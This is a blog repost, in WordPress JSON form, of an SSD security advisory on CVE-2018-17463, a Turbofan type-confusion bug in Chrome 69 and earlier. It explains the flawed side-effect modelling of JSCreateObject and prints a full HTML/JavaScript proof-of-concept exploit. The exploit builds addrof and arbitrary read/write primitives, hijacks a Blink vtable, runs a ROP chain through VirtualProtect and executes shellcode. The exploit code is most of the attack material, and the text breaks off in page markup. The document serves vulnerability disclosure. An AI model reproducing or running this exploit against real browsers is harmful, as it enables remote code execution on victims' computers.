{"id":13713,"date":"2018-10-29T14:19:04","date_gmt":"2018-10-29T22:19:04","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2018\/10\/29\/news-7480\/"},"modified":"2018-10-29T14:19:04","modified_gmt":"2018-10-29T22:19:04","slug":"news-7480","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2018\/10\/29\/news-7480\/","title":{"rendered":"SSD Advisory \u2013 Chrome Type Confusion in JSCreateObject Operation to RCE"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Ori Nimron| Date: Mon, 29 Oct 2018 09:21:47 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities Summary<\/strong><br \/> The following advisory discusses a vulnerability found in turbofan, the JIT compiler. We can trigger the JavaScript code in a way that leads to type confusion that can be exploited in order to execute code remotely on Google Chrome Versions 69.0 and before.<\/p>\n<p><strong>Vendor Response<\/strong><br \/> Vendor has fixed the issue in Google Chrome version 70.<\/p>\n<p><strong>CVE<\/strong><br \/> CVE-2018-17463<\/p>\n<p><strong>Credit<\/strong><br \/> Independent security researcher, Samuel Gro\u00df, had reported this vulnerability to Beyond Security&#8217;s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Affected systems<\/strong><br \/> Google Chrome Versions 69.0 and before.<br \/> <span id=\"more-3783\"><\/span><br \/> <strong>Vulnerability Details<\/strong><br \/> In turbofan, the JIT compiler for v8, code is represented in a custom intermediate representation (IR) suitable for the various optimizations. To be able to detect and remove redundant checks, turbofan has to be able to model the side effects of all its IR operations. If this modelling is incorrect, safety checks, such as type checks, will incorrectly be removed from the emitted code, resulting in type confusions at runtime. See <a href=\"https:\/\/saelo.github.io\/presentations\/blackhat_us_18_attacking_client_side_jit_compilers.pdf\">https:\/\/saelo.github.io\/presentations\/blackhat_us_18_attacking_client_side_jit_compilers.pdf<\/a> for more information about this type of vulnerability. Turbofan assumes that the JSCreateObject operation, used for JavaScript code such as \u201clet newObj = Object.create(proto)\u201d, is completely side-effect free, as can be seen in the definition of the operation in js-operator.cc (the kNoWrite flag essentially means that the operation is sideeffect free):<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5bd78757240ff960740624\" class=\"crayon-syntax crayon-theme-secrets-of-rock crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> V(CreateObject, Operator::kNoWrite, 1, 1)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0005 seconds] -->  <\/p>\n<p>This assumption is, however, not correct: when creating a new object with the given prototype object, this prototype object is modified if this is the first time that the object is used as a prototype. In particular, if the object had fast storage of properties before (all properties in a linear array), it will be converted to dictionary mode (properties stored in a hash map). However, due to the incorrect side-effect modelling, following JIT code still assumes that the prototype object has fast property storage. This leads to a type confusion between a PropertyArray and a NameDictionary when accessing properties of the prototype.<\/p>\n<p><strong>Exploit<\/strong><br \/> The initial type confusion gained from the bug can be turned into a confusion between two properties of an object as both the PropertyArray and the NameDictionary store property values inline. As such, the code following the CreateObject operation might load a property X from the object but will actually load the value of property Y. This in turn can be used to construct additional type confusion primitives due to the fact that v8 traces the types of properties of an object. For example, v8 might know that some property will always contain a pointer to an object with a certain Map and will remove type checks based on that. When it then fetches a different property due to the bug, it might load a double value which it would then use as a pointer. The exploit constructs two type confusions to obtain arbitrary read\/write of the process\u2019 memory: The addrof function in the attached PoC exploit constructs a confusion between an unboxed double property and a JSObject pointer property, thus leaking the value of the pointer and defeating ASLR. The corrupt_arraybuffer function then constructs a confusion between an ArrayBuffer and an object with inline properties, allowing it to corrupt the pointer to the backing storage of the ArrayBuffer with an arbitrary address. This way the exploit obtains an arbitrary read\/write primitive. Finally, a Blink object with a vtable is corrupted and a virtual call performed on it, leading to RIP control, the execution of a small ROP chain, and finally shellcode execution.<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5bd7875724109470309230\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<p><span class=\"crayon-language\">JavaScript<\/span><\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &lt;!DOCTYPE html&gt;  &lt;html&gt;      &lt;head&gt;          &lt;script&gt;          log = console.log;          print = alert;            \/\/ We need some space later          let scratch = new ArrayBuffer(0x100000);          let scratch_u8 = new Uint8Array(scratch);          let scratch_u64 = new BigUint64Array(scratch);          scratch_u8.fill(0x41, 0, 10);            let shellcode = new Uint8Array(4);          shellcode[0] = 0xcc;          shellcode[1] = 0xbe;          shellcode[2] = 0x20;          shellcode[3] = 0x18;            let ab = new ArrayBuffer(8);          let floatView = new Float64Array(ab);          let uint64View = new BigUint64Array(ab);          let uint8View = new Uint8Array(ab);            Number.prototype.toBigInt = function toBigInt() {              floatView[0] = this;              return uint64View[0];          };            BigInt.prototype.toNumber = function toNumber() {              uint64View[0] = this;              return floatView[0];          };            function hex(n) {              return &#8216;0x&#8217; + n.toString(16);          };            function fail(s) {              print(&#8216;FAIL &#8216; + s);              throw null;          }            const NUM_PROPERTIES = 32;          const MAX_ITERATIONS = 100000;            function gc() {              for (let i = 0; i &lt; 200; i++) {                  new ArrayBuffer(0x100000);              }          }            function make(properties) {              let o = {inline: 42}      \/\/ TODO              for (let i = 0; i &lt; NUM_PROPERTIES; i++) {                  eval(`o.p${i} = properties[${i}];`);              }              return o;          }            function pwn() {              function find_overlapping_properties() {                  let propertyNames = [];                  for (let i = 0; i &lt; NUM_PROPERTIES; i++) {                      propertyNames[i] = `p${i}`;                  }                  eval(`                      function vuln(o) {                          let a = o.inline;                          this.Object.create(o);                          ${propertyNames.map((p) =&gt; `let ${p} = o.${p};`).join(&#8216;n&#8217;)}                          return [${propertyNames.join(&#8216;, &#8216;)}];                      }                  `);                    let propertyValues = [];                  for (let i = 1; i &lt; NUM_PROPERTIES; i++) {                      propertyValues[i] = -i;                  }                    for (let i = 0; i &lt; MAX_ITERATIONS; i++) {                      let r = vuln(make(propertyValues));                      if (r[1] !== -1) {                          for (let i = 1; i &lt; r.length; i++) {                              if (i !== -r[i] &amp;&amp; r[i] &lt; 0 &amp;&amp; r[i] &gt; -NUM_PROPERTIES) {                                  return [i, -r[i]];                              }                          }                      }                  }                    fail(&#8220;Failed to find overlapping properties&#8221;);              }                function addrof(obj) {                  eval(`                      function vuln(o) {                          let a = o.inline;                          this.Object.create(o);                          return o.p${p1}.x1;                      }                  `);                    let propertyValues = [];                  propertyValues[p1] = {x1: 13.37, x2: 13.38};                  propertyValues[p2] = {y1: obj};                    let i = 0;                  for (; i &lt; MAX_ITERATIONS; i++) {                      let res = vuln(make(propertyValues));                      if (res !== 13.37)                          return res.toBigInt()                  }                    fail(&#8220;Addrof failed&#8221;);              }                function corrupt_arraybuffer(victim, newValue) {                  eval(`                      function vuln(o) {                          let a = o.inline;                          this.Object.create(o);                          let orig = o.p${p1}.x2;                          o.p${p1}.x2 = ${newValue.toNumber()};                          return orig;                      }                  `);                    let propertyValues = [];                  let o = {x1: 13.37, x2: 13.38};                  propertyValues[p1] = o;                  propertyValues[p2] = victim;                    for (let i = 0; i &lt; MAX_ITERATIONS; i++) {                      o.x2 = 13.38;                      let r = vuln(make(propertyValues));                      if (r !== 13.38)                          return r.toBigInt();                  }                    fail(&#8220;Corrupt ArrayBuffer failed&#8221;);              }                let [p1, p2] = find_overlapping_properties();              log(`[+] Properties p${p1} and p${p2} overlap after conversion to dictionary mode`);                let memview_buf = new ArrayBuffer(1024);              let driver_buf = new ArrayBuffer(1024);                gc();                  let memview_buf_addr = addrof(memview_buf);              memview_buf_addr&#8211;;              log(`[+] ArrayBuffer @ ${hex(memview_buf_addr)}`);                let original_driver_buf_ptr = corrupt_arraybuffer(driver_buf, memview_buf_addr);                let driver = new BigUint64Array(driver_buf);              let original_memview_buf_ptr = driver[4];                let memory = {                  write(addr, bytes) {                      driver[4] = addr;                      let memview = new Uint8Array(memview_buf);                      memview.set(bytes);                  },                  read(addr, len) {                      driver[4] = addr;                      let memview = new Uint8Array(memview_buf);                      return memview.subarray(0, len);                  },                  readPtr(addr) {                      driver[4] = addr;                      let memview = new BigUint64Array(memview_buf);                      return memview[0];                  },                  writePtr(addr, ptr) {                      driver[4] = addr;                      let memview = new BigUint64Array(memview_buf);                      memview[0] = ptr;                  },                  addrof(obj) {                      memview_buf.leakMe = obj;                      let props = this.readPtr(memview_buf_addr + 8n);                      return this.readPtr(props + 15n) &#8211; 1n;                  },              };                let div = document.createElement(&#8216;div&#8217;);              let div_addr = memory.addrof(div);              \/\/alert(&#8216;div_addr = &#8216; + hex(div_addr));              let el_addr = memory.readPtr(div_addr + 0x20n);              let leak = memory.readPtr(el_addr);                let chrome_child = leak &#8211; 0x40b5f20n;              \/\/print(&#8216;chrome_child @ &#8216; + hex(chrome_child));              \/\/ CreateEventW              let kernel32 = memory.readPtr(chrome_child + 0x4771260n) &#8211; 0x20750n;              \/\/print(&#8216;kernel32 @ &#8216; + hex(kernel32));              \/\/ NtQueryEvent              let ntdll = memory.readPtr(kernel32 + 0x79208n) &#8211; 0x9a9a0n;              \/\/print(&#8216;ntdll @ &#8216; + hex(ntdll));                \/*              00007ff9`296f0705 488b5150        mov     rdx,qword ptr [rcx+50h]              00007ff9`296f0709 488b6918        mov     rbp,qword ptr [rcx+18h]              00007ff9`296f070d 488b6110        mov     rsp,qword ptr [rcx+10h]              00007ff9`296f0711 ffe2            jmp     rdx              *\/                let gadget = ntdll + 0xA0705n;              \/\/let gadget = 0x41414141n;                let pop_gadgets = [                  chrome_child + 0x36a657n, \/\/ pop rcx ; ret     59 c3                  chrome_child + 0x9962n, \/\/ pop rdx ; ret       5a c3                  chrome_child + 0xc72852n, \/\/ pop r8 ; ret      41 58 c3                  chrome_child + 0xc51425n, \/\/ pop r9 ; ret      41 59 c3              ];                let scratch_addr = memory.readPtr(memory.addrof(scratch) + 0x20n);                let sc_offset = 0x20000n &#8211; scratch_addr % 0x1000n;              let sc_addr = scratch_addr + sc_offset              scratch_u8.set(shellcode, Number(sc_offset));                scratch_u64.fill(gadget, 0, 100);              \/\/scratch_u64.fill(0xdeadbeefn, 0, 100);                let fake_vtab = scratch_addr;              let fake_stack = scratch_addr + 0x10000n;                let stack = [                  pop_gadgets[0],                  sc_addr,                  pop_gadgets[1],                  0x1000n,                  pop_gadgets[2],                  0x40n,                  pop_gadgets[3],                  scratch_addr,                  kernel32 + 0x193d0n, \/\/ VirtualProtect                  sc_addr,              ];              for (let i = 0; i &lt; stack.length; ++i) {                  scratch_u64[0x10000\/8 + i] = stack[i];              }                memory.writePtr(el_addr + 0x10n, fake_stack); \/\/ RSP              memory.writePtr(el_addr + 0x50n, pop_gadgets[0] + 1n); \/\/ RIP = ret              memory.writePtr(el_addr + 0x58n, 0n);              memory.writePtr(el_addr + 0x60n, 0n);              memory.writePtr(el_addr + 0x68n, 0n);              memory.writePtr(el_addr, fake_vtab);                \/\/ Trigger virtual call              div.dispatchEvent(new Event(&#8216;click&#8217;));                \/\/ We are done here, repair the corrupted array buffers              let addr = memory.addrof(driver_buf);              memory.writePtr(addr + 32n, original_driver_buf_ptr);              memory.writePtr(memview_buf_addr + 32n, original_memview_buf_ptr);          }            alert(&#8220;Press OK to pwn&#8221;);          pwn();          &lt;\/script&gt;      &lt;\/head&gt;      &lt;body&gt;      &lt;\/body&gt;  &lt;\/html&gt;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-70\">70<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-72\">72<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-73\">73<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-74\">74<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-75\">75<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-76\">76<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-77\">77<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-78\">78<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-79\">79<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-80\">80<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-81\">81<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-82\">82<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-83\">83<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-84\">84<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-85\">85<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-86\">86<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-87\">87<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-88\">88<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-89\">89<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-90\">90<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-91\">91<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-92\">92<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-93\">93<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-94\">94<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-95\">95<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-96\">96<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-97\">97<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-98\">98<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-99\">99<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-100\">100<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-101\">101<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-102\">102<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-103\">103<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-104\">104<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-105\">105<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-106\">106<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-107\">107<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-108\">108<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-109\">109<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-110\">110<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-111\">111<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-112\">112<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-113\">113<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-114\">114<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-115\">115<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-116\">116<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-117\">117<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-118\">118<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-119\">119<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-120\">120<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-121\">121<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-122\">122<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-123\">123<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-124\">124<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-125\">125<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-126\">126<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-127\">127<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-128\">128<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-129\">129<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-130\">130<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-131\">131<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-132\">132<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-133\">133<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-134\">134<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-135\">135<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-136\">136<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-137\">137<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-138\">138<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-139\">139<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-140\">140<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-141\">141<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-142\">142<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-143\">143<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-144\">144<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-145\">145<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-146\">146<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-147\">147<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-148\">148<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-149\">149<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-150\">150<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-151\">151<\/div>\n<div 